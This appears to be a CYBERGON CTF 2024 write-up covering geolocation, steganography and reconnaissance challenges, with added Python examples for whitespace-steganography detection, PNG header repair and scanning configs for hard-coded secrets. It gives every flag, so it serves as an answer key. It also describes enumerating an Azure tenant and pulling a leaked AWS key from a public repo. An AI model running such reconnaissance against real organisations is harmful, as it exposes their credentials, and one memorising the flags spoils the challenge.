CYBERGON_CTF2024{Muong Thanh Luxury Ha Long Centre Hotel, Ha Long, Vietnam}


Vacation (2)
Nice! You found the hotel name in Vacation (1). Can you find another location
in this photo as well?

Flag Format - CYBERGON_CTF2024{The specific name of location}

Author - Andro6

We found this photo on Facebook, where it had been uploaded by one of the members of
Cybergon who visited Halong, Vietnam, for his vacation.
We then examined the photo using search engines and found the location.

This place is Làng Rèn Thần Kiếm, where traditional sword forging meets the serene
beauty of Hạ Long, Vietnam.

CYBERGON_CTF2024{Lang Ren Than Kiem}


The pagoda
Can you locate the donation center's position using what3words? Also, do you
know how many standing Buddha statues are there, and could you provide their
names ? (remove "///" for what3words and used only top left value, the name
should be alphabetical order)

CYBERGON_CTF2024{xxxx.xxxx.xxxx_number_Name_Name_Name_Name}

Author - iamkfromburma

This photo shows the Ananda Temple.

We then searched for Ananda Pagoda in what3words and found the location of the donation
center.

After further observation, we found the names of the four standing Buddha statues.


CYBERGON_CTF2024{doorstops.overthrows.folder_4_Gautama_Kakusandha_Kassapa_Kanagamana}

The Train & The Bridge


Can you find the built year of the train from the photo, bridge name from the
video and the published date of this video ?

[Example - 2024, Abc Def Bridge, 01 Jan 1991 = CYBERGON_CTF2024{2024_abcdef_01-01-1991}]

CYBERGON_CTF2024{1969_gokteik_09-05-2019}

History repeats itself


A historic event played a key role in this picture. Can you identify the date
of that event?

Flag Format - CYBERGON_CTF2024{MMMM_dd_yyyy} Example - CYBERGON_CTF2024{December_01_2024}

This photo relates to the Panglong Agreement event, so we looked up the date of the
Panglong Agreement.
CYBERGON_CTF2024{February_12_1947}
Stegano
Invisible
Sometimes it's a relief to be invisible. CYBERGON_CTF2024{xxxx_xxxx_xxxxx}

Author - iamkfromburma

After zooming all the way out and looking carefully, I found that this image contains some text.

I then used the stegsolve tool to view the image in its different bit planes.
Finally I got the flag text.
CYBERGON_CTF2024{getyourflag}

What's behind the wall ?


Find the secret behind the wall ? CYBERGON_CTF2024{xxxx_xxxxx_xxxxx}

Author - iamkfromburma

In this challenge, I found extra tab and space characters in JS.txt.

I also found interesting data that looked like a password in challenge4.jpg.


I used the stegsnow tool to decode the message, because it hides messages in text files by
appending tabs and spaces to the ends of lines. Then I got the flag.

CYBERGON_CTF2024{3X1f_w1th_5n0w5}
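
Trailing tabs and spaces like the ones noticed in JS.txt are invisible in most viewers, so it helps to render them before choosing a decoder. The following is an added example, not part of the original writeup; the sample text, the function names and the three-line threshold are constructed assumptions, and the code only detects trailing whitespace, it does not decode a message.

```python
import re

TRAILING = re.compile(r"[ \t]+$")

# Constructed sample: JavaScript-like text with tabs/spaces appended to lines.
SAMPLE = "\n".join([
    "function a() {" + "\t" + " " * 3 + "\t" + " ",
    "  return 1;" + " " + "\t" + " " * 5 + "\t",
    "}" + "\t" + " " + "\t" + " " * 2,
    "console.log(a());",
    "",
])


def trailing_runs(text: str):
    """Return [(line_no, run)] with S for space and T for tab at each line end."""
    hits = []
    for no, line in enumerate(text.split("\n"), start=1):
        m = TRAILING.search(line.rstrip("\r"))
        if m:
            hits.append((no, m.group().replace(" ", "S").replace("\t", "T")))
    return hits


def looks_like_whitespace_stego(text: str, min_lines: int = 3) -> bool:
    """Heuristic: stray editor whitespace rarely puts tabs at many line ends."""
    tabbed = [run for _, run in trailing_runs(text) if "T" in run]
    return len(tabbed) >= min_lines


if __name__ == "__main__":
    for no, run in trailing_runs(SAMPLE):
        print(f"line {no}: {len(run)} trailing chars  {run}")
    print("suspicious:", looks_like_whitespace_stego(SAMPLE))
```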

(3) Truesight
If you are waiting for a sign, this is it. CYBERGON_CTF2024{xxx_xxxx_xxxxx}

Author - iamkfromburma

I observed that this challenge image has the wrong file signature.

I used the hexeditor tool to change the header to the PNG file signature, 89 50 4E 47 0D 0A 1A 0A.

Then I got the flag.


CYBERGON_CTF2024{y0u_g07_7h3_r!gh7_s1gn5}
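
The hex-editor fix can be scripted with a safety check: only rewrite the first eight bytes when a valid IHDR chunk follows them, which confirms the file really is a PNG with a damaged signature. The following is an added example, not part of the original writeup or the challenge image; the 1x1 sample image and the function names are constructed.

```python
import struct
import zlib

PNG_SIG = bytes.fromhex("89504E470D0A1A0A")


def first_chunk(data: bytes):
    """Parse the chunk after the 8-byte signature; return (type, crc_ok) or None."""
    if len(data) < 20:
        return None
    length, ctype = struct.unpack_from(">I4s", data, 8)
    body_end = 16 + length
    if body_end + 4 > len(data):
        return None
    (stored_crc,) = struct.unpack_from(">I", data, body_end)
    # The CRC covers the chunk type and the chunk data, not the length field
    return ctype, zlib.crc32(data[12:body_end]) == stored_crc


def repair_png_signature(data: bytes):
    """Return (bytes, changed); rewrite only if a valid IHDR follows the header."""
    if data[:8] == PNG_SIG:
        return data, False
    if first_chunk(data) != (b"IHDR", True):
        raise ValueError("no valid IHDR chunk at offset 8; not a signature-only fault")
    return PNG_SIG + data[8:], True


def chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC."""
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample() -> bytes:
    """Constructed 1x1 grayscale PNG whose signature bytes were zeroed out."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    body = chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    return b"\x00" * 8 + body + chunk(b"IEND", b"")


if __name__ == "__main__":
    fixed, changed = repair_png_signature(build_sample())
    print(changed, fixed[:8].hex(" "), first_chunk(fixed))
```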
Reconnaissance
Validation
Can you determine the number of TXT and SPF records in flaghunt.lol?

Flag Format - CYBERGON_CTF2024{total TXT:total SPF}

Author : Too

We found 4 TXT records and 1 SPF record for flaghunt.lol.

CYBERGON_CTF2024{4:1}
(2) Secure Life
What is the certificate's expiration date?

Flag Format - CYBERGON_CTF2024{YYYY:MM:DD:HH:MM:SS}

Author : Too

The certificate's expiration date is Nov 24 20:38:00 2039 GMT.


CYBERGON_CTF2024{2039:11:24:20:38:00}

(3) Discovery
How many subdomains exist under flaghunt.lol?

Flag Format - CYBERGON_CTF2024{number of subdomains}

Author - Too

flaghunt.lol

We found that 19 subdomains exist under flaghunt.lol.


CYBERGON_CTF2024{19}

(4) Uncover
Intel Byte Company has Azure Entra Service. Your task is to uncover its name!!

Flag Format - CYBERGON_CTF2024{tenant's name}

Author - Too

We enumerated the Azure Entra Service tenant name of intelbyte.io with the
AADInternals tool.
CYBERGON_CTF2024{goddamnit2024.onmicrosoft.com}

(5) Leakage
An SRE working on Kubernetes deployments over AWS cloud accidentally
pushed sensitive code and configurations to a public GitHub repository. Upon
analysis, it seems like some configurations might be related with a server
api.flaghunt.lol.

Your task is to investigate the exposed repository and find sensitive
information like AWS credentials or other secrets.

Flag Format - CYBERGON_CTF2024{secrets}


Author - Too
github.com

We found 1 code result related to api.flaghunt.lol on GitHub.

We then examined dummybear00's repo.


There we found the AWS API key in the kubernetes-config file.

CYBERGON_CTF2024{34af-atg4-34gs-f234g-79g6}
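
A leak like this one is the kind a check run before every push is meant to catch. The following is an added example, not part of the original writeup and not taken from the challenge repository; the manifest, its values, the rule names and the function names are all constructed, and the patterns are a small illustrative set, not a complete ruleset.

```python
import re

AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
SENSITIVE = re.compile(r"(?i)secret|api[_-]?key|token|password|access[_-]?key")
KV = re.compile(r"^\s*-?\s*([\w.-]+)\s*[:=]\s*[\"']?([^\"'#\s]+)")
# Constructed sample manifest; every value below is made up for illustration.
SAMPLE = """\
env:
  - name: AWS_ACCESS_KEY_ID
    value: AKIAEXAMPLEEXAMPLE00
  - name: API_TOKEN
    value: "constructed-token-0001"
  - name: LOG_LEVEL
    value: info
  - name: DB_PASSWORD
    valueFrom:
      secretKeyRef:
        name: db-credentials
        key: password
"""


def redact(value: str) -> str:
    """Keep four characters so a finding can be located without re-leaking it."""
    return value[:4] + "*" * (len(value) - 4)


def scan_config(text: str):
    """Return [(line_no, rule, redacted_value)] for likely hard-coded secrets."""
    findings, env_name = [], None
    for no, line in enumerate(text.splitlines(), start=1):
        kv = KV.match(line)
        key, value = kv.groups() if kv else (None, None)
        hit = AWS_KEY_ID.search(line)
        if hit:
            findings.append((no, "aws-access-key-id", redact(hit.group())))
        elif key == "value" and env_name:
            # Kubernetes env entry: "name: X" on one line, literal on the next
            findings.append((no, f"env:{env_name}", redact(value)))
        elif key not in (None, "name", "value") and SENSITIVE.search(key):
            findings.append((no, f"key:{key}", redact(value)))
        env_name = value if key == "name" and SENSITIVE.search(value) else None
    return findings


if __name__ == "__main__":
    print(*scan_config(SAMPLE), sep="\n")
```

In the sample, DB_PASSWORD produces no finding because it is supplied through a secretKeyRef rather than a literal value, which is the form the other two entries should have used.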
Bonus
Where Are You Know

Take screenshot for your team profile including the ranking.


Post on social media (facebook, linkedin, twitter) with the hashtag #cybergonctf2024
Show post's screenshot and get the flag from me.
Author - iamkfromburma

Feedback

It's time to listen to your feedback. Hopefully, everyone will enjoy our CYBERGON CTF_2024 !!!!
CYBERGON_CTF2024{xxx_xxx_xxx}
Author – iamkfromburma

We got the flag after submitting the feedback.
